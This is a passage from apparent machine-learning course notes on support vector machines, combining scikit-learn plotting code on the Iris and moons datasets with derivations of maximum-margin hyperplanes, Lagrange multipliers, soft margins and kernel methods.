circles.
%matplotlib inline
# Fit three linear classifiers (LinearSVC, SVC with a linear kernel, and an
# SGD hinge-loss classifier) on two Iris classes, then compare their decision
# boundaries in the original (unscaled) petal feature space.
from sklearn import datasets
from sklearn.svm import SVC, LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.preprocessing import StandardScaler
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
# Keep only two features and the two linearly separable classes (setosa=0, versicolor=1).
iris = datasets.load_iris()
X = iris["data"][:, (2, 3)] # petal length, petal width
y = iris["target"]
setosa_or_versicolor = (y == 0) | (y == 1)
X = X[setosa_or_versicolor]
y = y[setosa_or_versicolor]
# SGDClassifier's regularisation strength alpha corresponds to 1/(C*n) for hinge loss,
# making its objective comparable to the SVMs' C parameter.
C = 5
alpha = 1 / (C * len(X))
lin_clf = LinearSVC(loss="hinge", C=C, random_state=42)
svm_clf = SVC(kernel="linear", C=C)
sgd_clf = SGDClassifier(loss="hinge", learning_rate="constant", eta0=0.001, alpha=alpha,
                        max_iter=100000, random_state=42)
# Standardize features before fitting; boundaries are mapped back below.
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
lin_clf.fit(X_scaled, y)
svm_clf.fit(X_scaled, y)
sgd_clf.fit(X_scaled, y)
print("LinearSVC:                   ", lin_clf.intercept_, lin_clf.coef_)
print("SVC:                         ", svm_clf.intercept_, svm_clf.coef_)
print("SGDClassifier(alpha={:.5f}):".format(sgd_clf.alpha), sgd_clf.intercept_, sgd_clf.coef_)
# Compute the slope and bias of each decision boundary
# (solve w0*x + w1*y + b = 0 for y as a function of x).
w1 = -lin_clf.coef_[0, 0]/lin_clf.coef_[0, 1]
b1 = -lin_clf.intercept_[0]/lin_clf.coef_[0, 1]
w2 = -svm_clf.coef_[0, 0]/svm_clf.coef_[0, 1]
b2 = -svm_clf.intercept_[0]/svm_clf.coef_[0, 1]
w3 = -sgd_clf.coef_[0, 0]/sgd_clf.coef_[0, 1]
b3 = -sgd_clf.intercept_[0]/sgd_clf.coef_[0, 1]
# Transform the decision boundary lines back to the original scale
# (two endpoints per line, undone through the fitted StandardScaler).
line1 = scaler.inverse_transform([[-10, -10 * w1 + b1], [10, 10 * w1 + b1]])
line2 = scaler.inverse_transform([[-10, -10 * w2 + b2], [10, 10 * w2 + b2]])
line3 = scaler.inverse_transform([[-10, -10 * w3 + b3], [10, 10 * w3 + b3]])
# Plot all three decision boundaries
plt.figure(figsize=(11, 4))
plt.plot(line1[:, 0], line1[:, 1], "k:", label="LinearSVC")
plt.plot(line2[:, 0], line2[:, 1], "b--", linewidth=2, label="SVC")
plt.plot(line3[:, 0], line3[:, 1], "r-", label="SGDClassifier")
plt.plot(X[:, 0][y==1], X[:, 1][y==1], "bs") # label="Iris-Versicolor"
plt.plot(X[:, 0][y==0], X[:, 1][y==0], "yo") # label="Iris-Setosa"
plt.xlabel("Petal length", fontsize=14)
plt.ylabel("Petal width", fontsize=14)
plt.legend(loc="upper center", fontsize=14)
plt.axis([0, 5.5, 0, 2])
plt.show()
### What is a hyperplane?
The aim of the SVM algorithm is to find a hyperplane in a
$p$-dimensional space, where $p$ is the number of features that
distinctly classifies the data points.
In a $p$-dimensional space, a hyperplane is what we call an affine subspace of dimension of $p-1$.
As an example, in two dimensions a hyperplane is simply a straight line, while in three dimensions it is
a two-dimensional subspace, or stated simply, a plane.
In two dimensions, with the variables $x_1$ and $x_2$, the hyperplane is defined as
$$
b+w_1x_1+w_2x_2=0,
$$
where $b$ is the intercept and $w_1$ and $w_2$ define the elements of a vector orthogonal to the line
$b+w_1x_1+w_2x_2=0$.
In two dimensions we define the vectors $\boldsymbol{x} =[x_1,x_2]$ and $\boldsymbol{w}=[w_1,w_2]$.
We can then rewrite the above equation as
$$
\boldsymbol{x}^T\boldsymbol{w}+b=0.
$$
We limit ourselves to two classes of outputs $y_i$ and assign these classes the values $y_i = \pm 1$.
In a $p$-dimensional space of say $p$ features we have a hyperplane defined as
$$
b+w_1x_1+w_2x_2+\dots +w_px_p=0.
$$
If we define a
matrix $\boldsymbol{X}=\left[\boldsymbol{x}_1,\boldsymbol{x}_2,\dots, \boldsymbol{x}_p\right]$
of dimension $n\times p$, where $n$ represents the observations for each feature and each vector $x_i$ is a column vector of the matrix $\boldsymbol{X}$,
$$
\boldsymbol{x}_i = \begin{bmatrix} x_{i1} \\ x_{i2} \\ \dots \\ \dots \\ x_{ip} \end{bmatrix}.
$$
If a given vector $\boldsymbol{x}_i$ does not lie on the hyperplane, we have
$$
b+w_1x_{i1}+w_2x_{i2}+\dots +w_px_{ip} >0,
$$
if our output $y_i=1$.
In this case we say that $\boldsymbol{x}_i$ lies on one of the sides of the hyperplane and if
$$
b+w_1x_{i1}+w_2x_{i2}+\dots +w_px_{ip} < 0,
$$
for the class of observations $y_i=-1$,
then $\boldsymbol{x}_i$ lies on the other side.
Equivalently, for the two classes of observations we have
$$
y_i\left(b+w_1x_{i1}+w_2x_{i2}+\dots +w_px_{ip}\right) > 0.
$$
When we try to separate hyperplanes, if it exists, we can use it to construct a natural classifier: a test observation is assigned a given class depending on which side of the hyperplane it is located.
## The two-dimensional case
Let us try to develop our intuition about SVMs by limiting ourselves to a two-dimensional
plane. To separate the two classes of data points, there are many
possible lines (hyperplanes if you prefer a more strict naming)
that could be chosen. Our objective is to find a
plane that has the maximum margin, i.e the maximum distance between
data points of both classes. Maximizing the margin distance provides
some reinforcement so that future data points can be classified with
more confidence.
What a linear classifier attempts to accomplish is to split the
feature space into two half spaces by placing a hyperplane between the
data points. This hyperplane will be our decision boundary. All
points on one side of the plane will belong to class one and all points
on the other side of the plane will belong to the second class two.
Unfortunately there are many ways in which we can place a hyperplane
to divide the data. Below is an example of two candidate hyperplanes
for our data sample.
Let us define the function
$$
f(x) = \boldsymbol{w}^T\boldsymbol{x}+b = 0,
$$
as the function that determines the line $L$ that separates two classes (our two features), see the figure here.
Any two points defined by $\boldsymbol{x}_1$ and $\boldsymbol{x}_2$ on the line $L$ will satisfy $\boldsymbol{w}^T(\boldsymbol{x}_1-\boldsymbol{x}_2)=0$.
The signed distance $\delta$ from any point defined by a vector $\boldsymbol{x}$ and a point $\boldsymbol{x}_0$ on the line $L$ is then
$$
\delta = \frac{1}{\vert\vert \boldsymbol{w}\vert\vert}(\boldsymbol{w}^T\boldsymbol{x}+b).
$$
How do we find the parameter $b$ and the vector $\boldsymbol{w}$? What we could
do is to define a cost function which now contains the set of all
misclassified points $M$ and attempt to minimize this function
$$
C(\boldsymbol{w},b) = -\sum_{i\in M} y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b).
$$
We could now for example define all values $y_i =1$ as misclassified in case we have $\boldsymbol{w}^T\boldsymbol{x}_i+b < 0$ and the opposite if we have $y_i=-1$. Taking the derivatives gives us
$$
\frac{\partial C}{\partial b} = -\sum_{i\in M} y_i,
$$
and
$$
\frac{\partial C}{\partial \boldsymbol{w}} = -\sum_{i\in M} y_ix_i.
$$
We can now use the Newton-Raphson method or different variants of the gradient descent family (from plain gradient descent to various stochastic gradient descent approaches) to solve the equations
$$
b \leftarrow b +\eta \frac{\partial C}{\partial b},
$$
and
$$
\boldsymbol{w} \leftarrow \boldsymbol{w} +\eta \frac{\partial C}{\partial \boldsymbol{w}},
$$
where $\eta$ is our by now well-known learning rate.
The equations we discussed above can be coded rather easily (the
framework is similar to what we developed for logistic
regression). We are going to set up a simple case with two classes only and we want to find a line which separates them the best possible way.
There are however problems with this approach, although it looks
pretty straightforward to implement. When running the above code, we see that we can easily end up with many different lines which separate the two classes.
For small
gaps between the entries, we may also end up needing many iterations
before the solutions converge and if the data cannot be separated
properly into two distinct classes, we may not achieve convergence
at all.
## A better approach
A better approach is rather to try to define a large margin between
the two classes (if they are well separated from the beginning).
Thus, we wish to find a margin $M$ with $\boldsymbol{w}$ normalized to
$\vert\vert \boldsymbol{w}\vert\vert =1$ subject to the condition
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq M \hspace{0.1cm}\forall i=1,2,\dots, n.
$$
All points are thus at a signed distance from the decision boundary defined by the line $L$. The parameters $b$ and $w_1$ and $w_2$ define this line.
We seek thus the largest value $M$ defined by
$$
\frac{1}{\vert \vert \boldsymbol{w}\vert\vert}y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq M \hspace{0.1cm}\forall i=1,2,\dots, n,
$$
or just
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq M\vert \vert \boldsymbol{w}\vert\vert \hspace{0.1cm}\forall i.
$$
If we scale the equation so that $\vert \vert \boldsymbol{w}\vert\vert = 1/M$, we have to find the minimum of
$\boldsymbol{w}^T\boldsymbol{w}=\vert \vert \boldsymbol{w}\vert\vert$ (the norm) subject to the condition
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) \geq 1 \hspace{0.1cm}\forall i.
$$
We have thus defined our margin as the inverse of the norm of
$\boldsymbol{w}$. We want to minimize the norm in order to have a as large as
possible margin $M$. Before we proceed, we need to remind ourselves
about Lagrangian multipliers.
Consider a function of three independent variables $f(x,y,z)$. For the function $f$ to be an
extreme we have
$$
df=0.
$$
A necessary and sufficient condition is
$$
\frac{\partial f}{\partial x} =\frac{\partial f}{\partial y}=\frac{\partial f}{\partial z}=0,
$$
due to
$$
df = \frac{\partial f}{\partial x}dx+\frac{\partial f}{\partial y}dy+\frac{\partial f}{\partial z}dz.
$$
In many problems the variables $x,y,z$ are often subject to constraints (such as those above for the margin)
so that they are no longer all independent. It is possible at least in principle to use each
constraint to eliminate one variable
and to proceed with a new and smaller set of independent variables.
The use of so-called Lagrangian multipliers is an alternative technique when the elimination
of variables is inconvenient or undesirable. Assume that we have an equation of constraint on
the variables $x,y,z$
$$
\phi(x,y,z) = 0,
$$
resulting in
$$
d\phi = \frac{\partial \phi}{\partial x}dx+\frac{\partial \phi}{\partial y}dy+\frac{\partial \phi}{\partial z}dz =0.
$$
Now we cannot set anymore
$$
\frac{\partial f}{\partial x} =\frac{\partial f}{\partial y}=\frac{\partial f}{\partial z}=0,
$$
if $df=0$ is wanted
because there are now only two independent variables! Assume $x$ and $y$ are the independent
variables.
Then $dz$ is no longer arbitrary.
However, we can add to
$$
df = \frac{\partial f}{\partial x}dx+\frac{\partial f}{\partial y}dy+\frac{\partial f}{\partial z}dz,
$$
a multiplum of $d\phi$, viz. $\lambda d\phi$, resulting in
$$
df+\lambda d\phi = (\frac{\partial f}{\partial x}+\lambda
\frac{\partial \phi}{\partial x})dx+(\frac{\partial f}{\partial y}+\lambda\frac{\partial \phi}{\partial y})dy+
(\frac{\partial f}{\partial z}+\lambda\frac{\partial \phi}{\partial z})dz =0.
$$
Our multiplier is chosen so that
$$
\frac{\partial f}{\partial z}+\lambda\frac{\partial \phi}{\partial z} =0.
$$
We need to remember that we took $dx$ and $dy$ to be arbitrary and thus we must have
$$
\frac{\partial f}{\partial x}+\lambda\frac{\partial \phi}{\partial x} =0,
$$
and
$$
\frac{\partial f}{\partial y}+\lambda\frac{\partial \phi}{\partial y} =0.
$$
When all these equations are satisfied, $df=0$. We have four unknowns, $x,y,z$ and
$\lambda$. Actually we want only $x,y,z$, $\lambda$ needs not to be determined,
it is therefore often called
Lagrange's undetermined multiplier.
If we have a set of constraints $\phi_k$ we have the equations
$$
\frac{\partial f}{\partial x_i}+\sum_k\lambda_k\frac{\partial \phi_k}{\partial x_i} =0.
$$
In order to solve the above problem, we define the following Lagrangian function to be minimized
$$
{\cal L}(\lambda,b,\boldsymbol{w})=\frac{1}{2}\boldsymbol{w}^T\boldsymbol{w}-\sum_{i=1}^n\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)-1\right],
$$
where $\lambda_i$ is a so-called Lagrange multiplier subject to the condition $\lambda_i \geq 0$.
Taking the derivatives with respect to $b$ and $\boldsymbol{w}$ we obtain
$$
\frac{\partial {\cal L}}{\partial b} = -\sum_{i} \lambda_iy_i=0,
$$
and
$$
\frac{\partial {\cal L}}{\partial \boldsymbol{w}} = 0 = \boldsymbol{w}-\sum_{i} \lambda_iy_i\boldsymbol{x}_i.
$$
Inserting these constraints into the equation for ${\cal L}$ we obtain
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{x}_j,
$$
subject to the constraints $\lambda_i\geq 0$ and $\sum_i\lambda_iy_i=0$.
We must in addition satisfy the [Karush-Kuhn-Tucker](https://en.wikipedia.org/wiki/Karush%E2%80%93Kuhn%E2%80%93Tucker_conditions) (KKT) condition
$$
\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) -1\right] = 0 \hspace{0.1cm}\forall i.
$$
1. If $\lambda_i > 0$, then $y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1$ and we say that $x_i$ is on the boundary.
2. If $y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)> 1$, we say $x_i$ is not on the boundary and we set $\lambda_i=0$.
When $\lambda_i > 0$, the vectors $\boldsymbol{x}_i$ are called support vectors. They are the vectors closest to the line (or hyperplane) and define the margin $M$.
We can rewrite
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{x}_j,
$$
and its constraints in terms of a matrix-vector problem where we minimize w.r.t. $\lambda$ the following problem
$$
\frac{1}{2} \boldsymbol{\lambda}^T\begin{bmatrix} y_1y_1\boldsymbol{x}_1^T\boldsymbol{x}_1 & y_1y_2\boldsymbol{x}_1^T\boldsymbol{x}_2 & \dots & \dots & y_1y_n\boldsymbol{x}_1^T\boldsymbol{x}_n \\
y_2y_1\boldsymbol{x}_2^T\boldsymbol{x}_1 & y_2y_2\boldsymbol{x}_2^T\boldsymbol{x}_2 & \dots & \dots & y_2y_n\boldsymbol{x}_2^T\boldsymbol{x}_n \\
\dots & \dots & \dots & \dots & \dots \\
\dots & \dots & \dots & \dots & \dots \\
y_ny_1\boldsymbol{x}_n^T\boldsymbol{x}_1 & y_ny_2\boldsymbol{x}_n^T\boldsymbol{x}_2 & \dots & \dots & y_ny_n\boldsymbol{x}_n^T\boldsymbol{x}_n \\
\end{bmatrix}\boldsymbol{\lambda}-\mathbb{1}\boldsymbol{\lambda},
$$
subject to $\boldsymbol{y}^T\boldsymbol{\lambda}=0$. Here we defined the vectors $\boldsymbol{\lambda} =[\lambda_1,\lambda_2,\dots,\lambda_n]$ and
$\boldsymbol{y}=[y_1,y_2,\dots,y_n]$.
Solving the above problem, yields the values of $\lambda_i$.
To find the coefficients of your hyperplane we need simply to compute
$$
\boldsymbol{w}=\sum_{i} \lambda_iy_i\boldsymbol{x}_i.
$$
With our vector $\boldsymbol{w}$ we can in turn find the value of the intercept $b$ (here in two dimensions) via
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1,
$$
resulting in
$$
b = \frac{1}{y_i}-\boldsymbol{w}^T\boldsymbol{x}_i,
$$
or if we write it out in terms of the support vectors only, with $N_s$ being their number, we have
$$
b = \frac{1}{N_s}\sum_{j\in N_s}\left(y_j-\sum_{i=1}^n\lambda_iy_i\boldsymbol{x}_i^T\boldsymbol{x}_j\right).
$$
With our hyperplane coefficients we can use our classifier to assign any observation by simply using
$$
y_i = \mathrm{sign}(\boldsymbol{w}^T\boldsymbol{x}_i+b).
$$
Below we discuss how to find the optimal values of $\lambda_i$. Before we proceed however, we discuss now the so-called soft classifier.
## A soft classifier
Till now, the margin is strictly defined by the support vectors. This defines what is called a hard classifier, that is the margins are well defined.
Suppose now that classes overlap in feature space, as shown in the
figure here. One way to deal with this problem before we define the
so-called **kernel approach**, is to allow a kind of slack in the sense
that we allow some points to be on the wrong side of the margin.
We introduce thus the so-called **slack** variables $\boldsymbol{\xi} =[\xi_1,\xi_2,\dots,\xi_n]$ and
modify our previous equation
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1,
$$
to
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1-\xi_i,
$$
with the requirement $\xi_i\geq 0$. The total violation is now $\sum_i\xi_i$.
The value $\xi_i$ in the last constraint corresponds to the amount by which the prediction
$y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)=1$ is on the wrong side of its margin. Hence by bounding the sum $\sum_i \xi_i$,
we bound the total amount by which predictions fall on the wrong side of their margins.
Misclassifications occur when $\xi_i > 1$. Thus bounding the total sum by some value $C$ bounds in turn the total number of
misclassifications.
This has in turn the consequences that we change our optmization problem to finding the minimum of
$$
{\cal L}=\frac{1}{2}\boldsymbol{w}^T\boldsymbol{w}-\sum_{i=1}^n\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)-(1-\xi_i)\right]+C\sum_{i=1}^n\xi_i-\sum_{i=1}^n\gamma_i\xi_i,
$$
subject to
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)\geq 1-\xi_i \hspace{0.1cm}\forall i,
$$
with the requirement $\xi_i\geq 0$.
Taking the derivatives with respect to $b$ and $\boldsymbol{w}$ we obtain
$$
\frac{\partial {\cal L}}{\partial b} = -\sum_{i} \lambda_iy_i=0,
$$
and
$$
\frac{\partial {\cal L}}{\partial \boldsymbol{w}} = 0 = \boldsymbol{w}-\sum_{i} \lambda_iy_i\boldsymbol{x}_i,
$$
and
$$
\lambda_i = C-\gamma_i \hspace{0.1cm}\forall i.
$$
Inserting these constraints into the equation for ${\cal L}$ we obtain the same equation as before
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{x}_i^T\boldsymbol{x}_j,
$$
but now subject to the constraints $\lambda_i\geq 0$, $\sum_i\lambda_iy_i=0$ and $0\leq\lambda_i \leq C$.
We must in addition satisfy the Karush-Kuhn-Tucker condition which now reads
$$
\lambda_i\left[y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b)-(1-\xi_i)\right] = 0 \hspace{0.1cm}\forall i,
$$
$$
\gamma_i\xi_i = 0,
$$
and
$$
y_i(\boldsymbol{w}^T\boldsymbol{x}_i+b) -(1-\xi_i) \geq 0 \hspace{0.1cm}\forall i.
$$
## Kernels and non-linearity
The cases we have studied till now, were all characterized by two classes
with a close to linear separability. The classifiers we have described
so far find linear boundaries in our input feature space. It is
possible to make our procedure more flexible by exploring the feature
space using other basis expansions such as higher-order polynomials,
wavelets, splines etc.
If our feature space is not easy to separate, as shown in the figure
here, we can achieve a better separation by introducing more complex
basis functions. The ideal would be, as shown in the next figure, to obtain,
via a specific transformation, a separation between the classes which is almost linear.
The change of basis, from $x\rightarrow z=\phi(x)$ leads to the same type of equations to be solved, except that
we need to introduce for example a polynomial transformation to a two-dimensional training set.
import numpy as np
import os
np.random.seed(42)
# To plot pretty figures
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
from sklearn.svm import SVC
from sklearn import datasets
X1D = np.linspace(-4, 4, 9).reshape(-1, 1)
X2D = np.c_[X1D, X1D**2]
y = np.array([0, 0, 1, 1, 1, 1, 1, 0, 0])
plt.figure(figsize=(11, 4))
plt.subplot(121)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.plot(X1D[:, 0][y==0], np.zeros(4), "bs")
plt.plot(X1D[:, 0][y==1], np.zeros(5), "g^")
plt.gca().get_yaxis().set_ticks([])
plt.xlabel(r"$x_1$", fontsize=20)
plt.axis([-4.5, 4.5, -0.2, 0.2])
plt.subplot(122)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.plot(X2D[:, 0][y==0], X2D[:, 1][y==0], "bs")
plt.plot(X2D[:, 0][y==1], X2D[:, 1][y==1], "g^")
plt.xlabel(r"$x_1$", fontsize=20)
plt.ylabel(r"$x_2$", fontsize=20, rotation=0)
plt.gca().get_yaxis().set_ticks([0, 4, 8, 12, 16])
plt.plot([-4.5, 4.5], [6.5, 6.5], "r--", linewidth=3)
plt.axis([-4.5, 4.5, -1, 17])
plt.subplots_adjust(right=1)
plt.show()
Suppose we define a polynomial transformation of degree two only (we continue to live in a plane with $x_i$ and $y_i$ as variables)
$$
z = \phi(x_i) =\left(x_i^2, y_i^2, \sqrt{2}x_iy_i\right).
$$
With our new basis, the equations we solved earlier are basically the same, that is we have now (without the slack option for simplicity)
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_j\boldsymbol{z}_i^T\boldsymbol{z}_j,
$$
subject to the constraints $\lambda_i\geq 0$, $\sum_i\lambda_iy_i=0$, and for the support vectors
$$
y_i(\boldsymbol{w}^T\boldsymbol{z}_i+b)= 1 \hspace{0.1cm}\forall i,
$$
from which we also find $b$.
To compute $\boldsymbol{z}_i^T\boldsymbol{z}_j$ we define the kernel $K(\boldsymbol{x}_i,\boldsymbol{x}_j)$ as
$$
K(\boldsymbol{x}_i,\boldsymbol{x}_j)=\boldsymbol{z}_i^T\boldsymbol{z}_j= \phi(\boldsymbol{x}_i)^T\phi(\boldsymbol{x}_j).
$$
For the above example, the kernel reads
$$
K(\boldsymbol{x}_i,\boldsymbol{x}_j)=[x_i^2, y_i^2, \sqrt{2}x_iy_i]^T\begin{bmatrix} x_j^2 \\ y_j^2 \\ \sqrt{2}x_jy_j \end{bmatrix}=x_i^2x_j^2+2x_ix_jy_iy_j+y_i^2y_j^2.
$$
We note that this is nothing but the dot product of the two original
vectors $(\boldsymbol{x}_i^T\boldsymbol{x}_j)^2$. Instead of thus computing the
product in the Lagrangian of $\boldsymbol{z}_i^T\boldsymbol{z}_j$ we simply compute
the dot product $(\boldsymbol{x}_i^T\boldsymbol{x}_j)^2$.
This leads to the so-called
kernel trick and the result leads to the same as if we went through
the trouble of performing the transformation
$\phi(\boldsymbol{x}_i)^T\phi(\boldsymbol{x}_j)$ during the SVM calculations.
Using our definition of the kernel, we can rewrite again the Lagrangian
$$
{\cal L}=\sum_i\lambda_i-\frac{1}{2}\sum_{ij}^n\lambda_i\lambda_jy_iy_jK(\boldsymbol{x}_i,\boldsymbol{x}_j),
$$
subject to the constraints $\lambda_i\geq 0$, $\sum_i\lambda_iy_i=0$ in terms of a convex optimization problem
$$
\frac{1}{2} \boldsymbol{\lambda}^T\begin{bmatrix} y_1y_1K(\boldsymbol{x}_1,\boldsymbol{x}_1) & y_1y_2K(\boldsymbol{x}_1,\boldsymbol{x}_2) & \dots & \dots & y_1y_nK(\boldsymbol{x}_1,\boldsymbol{x}_n) \\
y_2y_1K(\boldsymbol{x}_2,\boldsymbol{x}_1) & y_2y_2K(\boldsymbol{x}_2,\boldsymbol{x}_2) & \dots & \dots & y_2y_nK(\boldsymbol{x}_2,\boldsymbol{x}_n) \\
\dots & \dots & \dots & \dots & \dots \\
\dots & \dots & \dots & \dots & \dots \\
y_ny_1K(\boldsymbol{x}_n,\boldsymbol{x}_1) & y_ny_2K(\boldsymbol{x}_n,\boldsymbol{x}_2) & \dots & \dots & y_ny_nK(\boldsymbol{x}_n,\boldsymbol{x}_n) \\
\end{bmatrix}\boldsymbol{\lambda}-\mathbb{1}\boldsymbol{\lambda},
$$
subject to $\boldsymbol{y}^T\boldsymbol{\lambda}=0$. Here we defined the vectors $\boldsymbol{\lambda} =[\lambda_1,\lambda_2,\dots,\lambda_n]$ and
$\boldsymbol{y}=[y_1,y_2,\dots,y_n]$.
If we add the slack constants this leads to the additional constraint $0\leq \lambda_i \leq C$.
We can rewrite this (see the solutions below) in terms of a convex optimization problem of the type
$$
\begin{align*}
&\mathrm{min}_{\lambda}\hspace{0.2cm} \frac{1}{2}\boldsymbol{\lambda}^T\boldsymbol{P}\boldsymbol{\lambda}+\boldsymbol{q}^T\boldsymbol{\lambda},\\ \nonumber
&\mathrm{subject\hspace{0.1cm}to} \hspace{0.2cm} \boldsymbol{G}\boldsymbol{\lambda} \preceq \boldsymbol{h} \hspace{0.2cm} \wedge \boldsymbol{A}\boldsymbol{\lambda}=f.
\end{align*}
$$
Below we discuss how to solve these equations. Here we note that the matrix $\boldsymbol{P}$ has matrix elements $p_{ij}=y_iy_jK(\boldsymbol{x}_i,\boldsymbol{x}_j)$.
Given a kernel $K$ and the targets $y_i$ this matrix is easy to set up. The constraint $\boldsymbol{y}^T\boldsymbol{\lambda}=0$ leads to $f=0$ and $\boldsymbol{A}=\boldsymbol{y}$. How to set up the matrix $\boldsymbol{G}$ is discussed later. Here note that the inequalities $0\leq \lambda_i \leq C$ can be split up into
$0\leq \lambda_i$ and $\lambda_i \leq C$. These two inequalities define then the matrix $\boldsymbol{G}$ and the vector $\boldsymbol{h}$.
## Different kernels and Mercer's theorem
There are several popular kernels being used. These are
1. Linear: $K(\boldsymbol{x},\boldsymbol{y})=\boldsymbol{x}^T\boldsymbol{y}$,
2. Polynomial: $K(\boldsymbol{x},\boldsymbol{y})=(\boldsymbol{x}^T\boldsymbol{y}+\gamma)^d$,
3. Gaussian Radial Basis Function: $K(\boldsymbol{x},\boldsymbol{y})=\exp{\left(-\gamma\vert\vert\boldsymbol{x}-\boldsymbol{y}\vert\vert^2\right)}$,
4. Tanh: $K(\boldsymbol{x},\boldsymbol{y})=\tanh{(\boldsymbol{x}^T\boldsymbol{y}+\gamma)}$,
and many other ones.
An important theorem for us is [Mercer's
theorem](https://en.wikipedia.org/wiki/Mercer%27s_theorem). The
theorem states that if a kernel function $K$ is symmetric, continuous
and leads to a positive semi-definite matrix $\boldsymbol{P}$ then there
exists a function $\phi$ that maps $\boldsymbol{x}_i$ and $\boldsymbol{x}_j$ into
another space (possibly with much higher dimensions) such that
$$
K(\boldsymbol{x}_i,\boldsymbol{x}_j)=\phi(\boldsymbol{x}_i)^T\phi(\boldsymbol{x}_j).
$$
So you can use $K$ as a kernel since you know $\phi$ exists, even if
you don’t know what $\phi$ is.
Note that some frequently used kernels (such as the Sigmoid kernel)
don’t respect all of Mercer’s conditions, yet they generally work well
in practice.
## The moons example
from __future__ import division, print_function, unicode_literals
import numpy as np
np.random.seed(42)
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
from sklearn.svm import SVC
from sklearn import datasets
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=100, noise=0.15, random_state=42)
def plot_dataset(X, y, axes):
plt.plot(X[:, 0][y==0], X[:, 1][y==0], "bs")
plt.plot(X[:, 0][y==1], X[:, 1][y==1], "g^")
plt.axis(axes)
plt.grid(True, which='both')
plt.xlabel(r"$x_1$", fontsize=20)
plt.ylabel(r"$x_2$", fontsize=20, rotation=0)
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.show()
from sklearn.datasets import make_moons
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
polynomial_svm_clf = Pipeline([
("poly_features", PolynomialFeatures(degree=3)),
("scaler", StandardScaler()),
("svm_clf", LinearSVC(C=10, loss="hinge", random_state=42))
])
polynomial_svm_clf.fit(X, y)
def plot_predictions(clf, axes):
x0s = np.linspace(axes[0], axes[1], 100)
x1s = np.linspace(axes[2], axes[3], 100)
x0, x1 = np.meshgrid(x0s, x1s)
X = np.c_[x0.ravel(), x1.ravel()]
y_pred = clf.predict(X).reshape(x0.shape)
y_decision = clf.decision_function(X).reshape(x0.shape)
plt.contourf(x0, x1, y_pred, cmap=plt.cm.brg, alpha=0.2)
plt.contourf(x0, x1, y_decision, cmap=plt.cm.brg, alpha=0.1)
plot_predictions(polynomial_svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.show()
from sklearn.svm import SVC
poly_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="poly", degree=3, coef0=1, C=5))
])
poly_kernel_svm_clf.fit(X, y)
poly100_kernel_svm_clf = Pipeline([
("scaler", StandardScaler()),
("svm_clf", SVC(kernel="poly", degree=10, coef0=100, C=5))
])
poly100_kernel_svm_clf.fit(X, y)
plt.figure(figsize=(11, 4))
plt.subplot(121)
plot_predictions(poly_kernel_svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.title(r"$d=3, r=1, C=5$", fontsize=18)
plt.subplot(122)
plot_predictions(poly100_kernel_svm_clf, [-1.5, 2.5, -1, 1.5])
plot_dataset(X, y, [-1.5, 2.5, -1, 1.5])
plt.title(r"$d=10, r=100, C=5$", fontsize=18)
plt.show()
def gaussian_rbf(x, landmark, gamma):
return np.exp(-gamma * np.linalg.norm(x - landmark, axis=1)**2)
gamma = 0.3
x1s = np.linspace(-4.5, 4.5, 200).reshape(-1, 1)
x2s = gaussian_rbf(x1s, -2, gamma)
x3s = gaussian_rbf(x1s, 1, gamma)
XK = np.c_[gaussian_rbf(X1D, -2, gamma), gaussian_rbf(X1D, 1, gamma)]
yk = np.array([0, 0, 1, 1, 1, 1, 1, 0, 0])
plt.figure(figsize=(11, 4))
plt.subplot(121)
plt.grid(True, which='both')
plt.axhline(y=0, color='k')
plt.scatter(x=[-2, 1], y=[0, 0], s=150, alpha=0.5, c="red")
plt.plot(X1D[:, 0][yk==0], np.zeros(4), "bs")
plt.plot(X1D[:, 0][yk==1], np.zeros(5), "g^")
plt.plot(x1s, x2s, "g--")
